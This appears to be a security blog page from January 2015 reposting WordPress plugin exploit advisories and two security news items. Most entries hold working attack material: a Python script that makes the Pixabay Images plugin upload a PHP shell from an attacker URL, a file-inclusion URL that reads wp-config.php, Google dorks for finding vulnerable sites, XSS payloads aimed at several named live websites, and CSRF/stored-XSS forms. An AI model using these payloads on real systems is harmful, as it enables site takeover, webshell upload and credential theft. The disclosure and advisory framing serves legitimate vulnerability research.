MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

26Jan/150

WordPress Pixarbay Images 2.3 XSS / Bypass / Upload / Traversal

 Mogwai Security Advisory MSA-2015-01
----------------------------------------------------------------------
  Title:              WP Pixarbay Images Multiple Vulnerabilities
  Product:            Pixarbay Images (Wordpress Plugin)
  Affected versions:  2.3
  Impact:             high
  Remote:             yes
  Product link:       https://wordpress.org/plugins/pixabay-images/
  Reported:           14/01/2015
  by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
 
 
Vendor's Description of the Software:
----------------------------------------------------------------------
Pixabay Images is a WordPress plugin that let's you pick CC0 public domain pictures from Pixabay and insert them with just a click anywhere on your blog. The images are safe to use, and paying attribution or linking back to the source is not required.
 
 
Business recommendation:
----------------------------------------------------------------------
Update to version 2.4
 
Vulnerability description:
----------------------------------------------------------------------
1) Authentication bypass
The plugin does not correctly check if the user is logged in. Certain code can be called without authentication
 
2) Arbitrary file upload
The plugin code does not validate the host in the provided download URL, which allows to upload malicious files, including PHP code.
 
3) Path Traversal
Certain values are not sanitized before they are used in a file operation. This allows to store files outside of the "download" folder. 
 
4) Cross Site Scripting (XSS)
The generated author link uses unsanitized user values which can be
abused for Cross Site Scripting (XSS) attacks. 
 
 
Proof of concept:
----------------------------------------------------------------------
The following PoC Python script can be used to download PHP files from
a attacker controlled host.
 
#!/usr/bin/env python
 
import argparse
import httplib, urllib
from urlparse import urlparse
 
def exploit(target_url, shellcode_url):
 
  target = urlparse(target_url)
 
  params = urllib.urlencode({'pixabay_upload': 1, 'image_url': shellcode_url,
'image_user': 'none', 'q':'xxx/../../../../../../mogwai'})
  headers = headers = {"Content-type": "application/x-www-form-urlencoded"}
 
  print "[+] Sending download request...."
  conn = httplib.HTTPConnection(target.netloc)
  conn.request("POST", target.path + "/wp-admin/", params, headers)
 
  response = conn.getresponse()
  response_data = response.read()
  if response.status != 200 and response_data != "Error: File attachment metadata
error":
    print "[-] Something went wrong"
    print response_data
    exit()
 
  conn.close()
 
 
# ---- Main code ----------------
parser = argparse.ArgumentParser()
parser.add_argument("target_url", help="The target url, for example
http://foo.bar/blog/")
parser.add_argument("shellcode_url", help="The url of the PHP file that should
be uploaded, for example: http://attacker.com/shell.php")
 
print "----------------------------------------------"
print " pixabay upload wordpress plugin exploit PoC"
print " Mogwai security"
print "----------------------------------------------"
 
arguments = parser.parse_args()
exploit(arguments.target_url, arguments.shellcode_url)
 
 
Vulnerable / tested versions:
----------------------------------------------------------------------
Pixabay Images 2.3
 
Disclosure timeline:
----------------------------------------------------------------------
14/01/2014: Reporting issues to the plugin author
15/01/2014: Release of fixed version (2.4)
19/01/2014: Public advisory
 
Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab
 
----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)
 
info@mogwaisecurity.de

(77)

21Jan/150

Oracle releases 167 critical security fixes for Java and Sun systems

Oracle critical security fixes Java Sun systems

Oracle has released a critical patch update fixing 167 vulnerabilities across hundreds of its products, warning that the worst of them could be remotely exploited by hackers.

The pressing fixes involve several of Oracle's most widely used products and scored a full 10.0 rating on the CVSS 2.0 Base Score for vulnerabilities, the highest score available.

"The highest CVSS 2.0 Base Score for vulnerabilities in this critical patch update is 10.0 for Fujitsu M10-1 of Oracle Sun Systems Products Suite, Java SE of Oracle Java SE, M10-4 of Oracle Sun Systems Products Suite and M10-4S Servers of Oracle Sun Systems Products Suite," read the advisory.

"Due to the threat posed by a successful attack, Oracle strongly recommends that customers apply critical patch update fixes as soon as possible."

Oracle warned that the updates for Fujitsu M10-1 of Oracle Sun Systems Products Suite are particularly important.

"This critical patch update contains 29 new security fixes for the Oracle Sun Systems Products Suite," the advisory said.

"Ten of these vulnerabilities may be remotely exploitable without authentication [and] may be exploited over a network without the need for a username and password."

The Oracle Java SE update fixes 19 flaws, 14 of which were also remotely exploitable.

The next most serious flaws relate to Oracle's Fusion Middleware, which received 35 security fixes. The worst carries a 9.3 rating and could also be remotely exploited.

The update follows reports that hackers are targeting enterprise companies with malware-laden patches purporting to come from Oracle.

The news comes during a period of heated debate about patching best practice. Microsoft announced plans on 9 January to stop offering non-paying customers advanced patch notifications.

The announcement led to a backlash in the security community, many feeling that the move is a money-grabbing tactic by Microsoft.

Prior to the move, Microsoft came to blows with Google over the search firm's public disclosure of a Windows bug.

Google Project Zero researchers publicly disclosed the bug in December 2014 having privately reported it to Microsoft in September. The move led to a debate about what constitutes responsible threat disclosure.

Fonte: http://www.v3.co.uk/v3-uk/news/2391065/oracle-releases-167-critical-security-fixes-for-java-and-sun-systems
(210)

19Jan/150

New York Post and UPI Twitter accounts hacked

HACKER TWITTER ACCOUNT

The Twitter accounts of the New York Post and United Press International (UPI) have been hacked with fake tweets on economic and military news.

In one post, the Pope was quoted on UPI's Twitter feed as saying that "World War III has begun".

Meanwhile, the New York Post's account said that hostilities had broken out between the United States and China.

It is the latest hack of a high-profile social media account, four days after US military command was compromised.

UPI, which is based in Washington, confirmed in a statement that both its Twitter account and news website had been hacked.

Six fake headlines were posted on its Twitter account and a breaking news banner was added to a fake story about the Federal Reserve on its homepage, the statement added.

A tweet on the New York Post's account said the USS George Washington, an aircraft carrier, was "engaged in active combat" against Chinese warships in the South China Sea.

A Pentagon official said the tweet about hostilities with China was "not true", AFP reports. The tweets have all since been deleted.

The New York Post says it is investigating the hack.

It comes just days after US President Barack Obama unveiled proposals to strengthen cyber security laws after a spate of attacks on high-profile US targets, including the Pentagon Twitter feed and Sony Pictures.

The Twitter account of the US military command was suspended last Monday following an attack by hackers claiming to support Islamic State.

In November hackers also released reams of confidential data stolen from Sony Pictures, and in recent years cyber criminals have attacked other US companies such as Home Depot and Target.

A number of media organisations, including AFP and the BBC, have also been subjected to cyber attacks over the past two years.

Fonte: http://www.bbc.com/news/world-us-canada-30853311
(2183)

19Jan/150

WordPress CIP4 Folder Download 1.10 Local File Inclusion

# Exploit Title: CIP4 Folder Download Widget LFI
# Google Dork: index of :/cip4-folder-download-widget
# Date: 13-01-2015
# Exploit Author: Ben khlifa Fahmi (XTnR3v0lt)
# Vendor Homepage: http://community.cip4.org
# Software Link: https://wordpress.org/plugins/cip4-folder-download-widget/
# Version: 1.10
# Tested on: Ubuntu 14.04
 
Dork : 
inurl:/wp-content/plugins/cip4-folder-download-widget/
 
Exploit : 
http://localhost/[wordpress]/wp-content/plugins/cip4-folder-download-widget/cip4-download.php?target=wp-config.php&info=wp-config.php
 
Ben khlifa Fahmi - Founder & CEO of Tunisian Cyber Army
Greetz to : Joseph - Michou - hackerXben - RaisoMos - Lola - All muslim hackers world wide

(147)

14Jan/150

WordPress Slideoptinprox Cross Site Scripting

|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
|[*] Exploit Title: Wordpress slideoptinprox Plugin Cross site  
scripting vulnerability
|
|[*] Google Dork: inurl:"/wp-content/plugins/slideoptinprox/"
|
|[*] Date : Date: 2015-01-08
|
|[*] Exploit Author: Ashiyane Digital Security Team
|
|[*]Vendor Homepage : https://pluginu.com/slideoptinprox/
|
|[*] Tested on: Windows 8.1,Kali Linux
|
|-------------------------------------------------------------------------|
|
|[*] Location :
[localhost]/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=[XSS]
|
|-------------------------------------------------------------------------|
|[*] Proof:
|
|[*]
http://www.fishingfanatic.us/wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://www.beziehung-retten24.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://voiceacting.com/blog//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://drdebranixon.com/wp-content/plugins/slideoptinprox/app/view.php?id=2%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
|
|[*]
http://pinguin-werkstatt.com//wp-content/plugins/slideoptinprox/inc/ar_submit.php?id=2&n=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E|
|-------------------------------------------------------------------------|
|[*] Discovered By : 4L1R3Z4                                              |
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|

(109)

14Jan/150

WordPress Simple Security Plugin XSS vulnerabilities

Advisory ID: HTB23244
Product: Simple Security WordPress Plugin
Vendor: MyWebsiteAdvisor 
Vulnerable Version(s): 1.1.5 and probably prior
Tested Version: 1.1.5
Advisory Publication:  December 17, 2014  [without technical details]
Vendor Notification: December 17, 2014 
Public Disclosure: January 14, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-9570
Risk Level: Low 
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
 
-----------------------------------------------------------------------------------------------
 
Advisory Details:
 
High-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Simple Security WordPress plugin, which 
can be exploited to perform Cross-Site Scripting attacks against administrators of WP websites with the vulnerable 
plugin.
 
 
1) Two Cross-Site Scripting (XSS) Vulnerabilities in Simple Security Wordpress Plugin: CVE-2014-9570
 
The discovered vulnerabilities can be used by attackers to steal administrator's cookies of a vulnerable website. This 
can lead to total website compromise. 
 
Attackers can also perform drive-by-download attacks against website admin by injecting malware or exploit-packs into 
vulnerable scripts.
 
1.1 User-supplied input passed via the "datefilter" HTTP GET parameter to "/wp-admin/users.php" script is not properly 
sanitised before being returned to the administrator. A remote attacker can trick a logged-in administrator to open a 
specially crafted link and execute arbitrary HTML and script code in his browser in the context of the vulnerable 
website.
 
The exploitation example below uses the "alert()" JavaScript function to display "ImmuniWeb" word:
 
http://[host]/wp-admin/users.php?page=access_log&datefilter=%27%22%3E%3Cscript%3Ealert%28/ImmuniWeb/%29;%3C/script%3E
 
1.2 User input passed via the "simple_security_ip_blacklist[]" HTTP POST parameter to "/wp-admin/users.php" script is 
not properly filtered before being returned to the administrator. A remote attacker can trick a logged-in administrator 
to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable 
website.
 
Below we provide a basic XSS exploit that uses JS "alert()" function to display "ImmuniWeb" pop-up:
 
 
<form action="http://[host]/wp-admin/users.php?page=ip_blacklist"; method="post" name="main">
<input type="hidden" name="page" value="access_log">
<input type="hidden" name="action" value="add_blacklist_ip">
<input type="hidden" name="simple_security_ip_blacklist[]" value="'><script>alert('ImmuniWeb');</script>">
<input type="submit" id="btn">
</form>
 
 
-----------------------------------------------------------------------------------------------
 
Solution:
 
Disclosure timeline:
2014-12-17 Vendor Alerted via contact form.
2014-01-02 Vendor Alerted via contact form and emails.
2014-01-12 Fix Requested via contact form and emails.
2014-01-14 Public disclosure with self-written patch.
 
Currently we are not aware of any official solution for this vulnerability.
Unofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: 
https://www.htbridge.com/advisory/HTB23244-patch.zip
 
-----------------------------------------------------------------------------------------------
 
References:
 
[1] High-Tech Bridge Advisory HTB23244 - https://www.htbridge.com/advisory/HTB23244 - Two XSS vulnerabilities in Simple 
Security WordPress plugin.
[2] Simple Security Wordpress Plugin - http://mywebsiteadvisor.com/ - Simple Security Plugin for WordPress is a basic 
Access Log system that can monitor successful and failed login attempts and block IP addresses.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public 
use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE 
is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and 
cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
 
-----------------------------------------------------------------------------------------------
 
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details 
of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.

(121)

14Jan/150

WordPress WP Unique Article Header Image 1.0 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in WP Unique Article Header Image Wordpress Plugin 
# Author: Manideep K  
# cve-id : CVE-2014-9400
# Plugin Homepage: https://wordpress.org/plugins/wp-unique-article-header-image/
# Version Affected: 1.0  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: gt_default_header and gt_homepage_header
# Vulnerability Class:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
 
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Goto settings -> GT Unique Header Image
2. Insert this payload “ "><script>alert(32)</script> “ into either or both of the fields "default post/page header image" and "home page header" 
Save settings and see XSS in action
3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=wp-unique-article-header-image/wp-unique-header.php" method="POST">
      <input type="hidden" name="setting" value="true" />
      <input type="hidden" name="gt_default_header" value="csrf attack" />
      <input type="hidden" name="gt_homepage_header" value="hi" />
      <input type="hidden" name="gt-header-option-submitted" value="Save Settings » " />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************

(88)

14Jan/150

WordPress WP Limit Posts Automatically 0.7 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in WP Limit Posts Automatically Wordpress Plugin 
# Author: Manideep K  
# cve-id: CVE-2014-9401
# Plugin Homepage: https://wordpress.org/plugins/wp-limit-posts-automatically/
# Version Affected: 0.7 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter:  all text fields to name - lpa_post_letters
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
Steps to Reproduce: (POC):
After installing the plugin
 
Stored XSS: 
1.  Goto settings -> Limit Posts Options
2.  Enter this payload – “ "><script>alert(32)</script> “ in any of the text columns. There is no minimum input validation. 
3.  Save changes and see XSS in action
4.  Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=wp-limit-posts-automatically/wp-limit-posts-automatically.php" method="POST">
      <input type="hidden" name="lpa_post_wordcut" value="Lettercut" />
      <input type="hidden" name="lpa_post_letters" value=" csrf baby" />
      <input type="hidden" name="lpa_post_ending" value="hi" />
      <input type="hidden" name="lpa_post_linktext" value="hi" />
      <input type="hidden" name="submitted" value="yes" />
      <input type="hidden" name="Submit" value="Update Options »" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Reported - Not yet fixed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(189)

14Jan/150

WordPress TweetScribe 1.1 CSRF / XSS

**************************************************************************************
# Title: CSRF / Stored XSS Vulnerability in TweetScribe Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9399
# Plugin Homepage: https://wordpress.org/plugins/tweetscribe/
# Version Affected: 1.1  (probably lower versions)
# Severity: High 
 
# Description: 
Vulnerable Parameter: tweetscribe_username
Vulnerability Class: 
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
# About Vulnerability:  This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc.
 
# Steps to Reproduce: (POC):
After installing the plugin
1. Goto settings -> Tweetscribe
2. Insert this payload “ "><script>alert(32)</script> “ into username field 
Update options and see XSS in action
3. Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=tweetscribe/tweetscribe.php&op=save" method="POST">
      <input type="hidden" name="tweetscribe_username" value="csrf baby" />
      <input type="hidden" name="tweetscribe_password" value="mdndnnd" />
      <input type="hidden" name="tweetscribe_text" value="test" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Plugin Closed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk
***************************************************************************************

(74)

14Jan/150

WordPress Twitter LiveBlog 1.1.2 CSRF / XSS

# Title: CSRF / Stored XSS Vulnerability in Twitter LiveBlog Wordpress Plugin 
# Author: Manideep K  
# CVE-ID: CVE-2014-9398 
# Plugin Homepage: https://wordpress.org/plugins/twitter-liveblog/
# Version Affected: 1.1.2 (probably lower versions)
# Severity: High 
 
# Description: 
# Vulnerable Parameter:  mashtlb_twitter_username etc
# About Vulnerability: This plugin is vulnerable to a combination of CSRF/XSS attack meaning that if an admin user can be tricked to visit a crafted URL created by attacker (via spear phishing/social engineering), the attacker can insert arbitrary script into admin page. Once exploited, admin’s browser can be made to do almost anything the admin user could typically do by hijacking admin's cookies etc. 
# Vulnerability Class:     
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29          
Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) 
 
Steps to Reproduce: (POC):
After installing the plugin
 
Stored XSS: 
1.  Goto settings -> Twitter LiveBlog
2.  Enter this payload – “ "><script>alert(32)</script> “ in any/all of the text fields. 
3.  Save changes and see XSS in action
4.  Visit settings page of this plugin anytime later and you can see the script executing as it is stored. 
 
Plugin does not uses any nonces and hence, the same settings can be changed using CSRF attack and the PoC code for the same is below
 
<html>
  <body>
    <form action="http://localhost/wordpress/wp-admin/options-general.php?page=twitter-liveblog.php" method="POST">
      <input type="hidden" name="mashtlb_twitter_username" value="csrf baby" />
      <input type="hidden" name="mashtlb_twitter_password" value="hi" />
      <input type="hidden" name="mashtlb_blog_post_category" value="1" />
      <input type="hidden" name="mashtlb_blog_post_tags" value="be" />
      <input type="hidden" name="mashtlb_blog_post_author" value="1" />
      <input type="hidden" name="mashtlb_twitter_interval" value="10" />
      <input type="hidden" name="mashtlb_twitter_liveblog_interval" value="2" />
      <input type="hidden" name="mashtlb_update_settings" value="Update Options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
 
 
# Mitigation: 
Reported - Not yet fixed
 
# Disclosure:
2014-11-06:  Author notification
2014-11-20:  WP Team action taken by closing the plugin as there is no response from author
2014-12-09: Public Disclosure
 
# Credits:
Manideep K
Information Security Researcher
https://in.linkedin.com/in/manideepk

(79)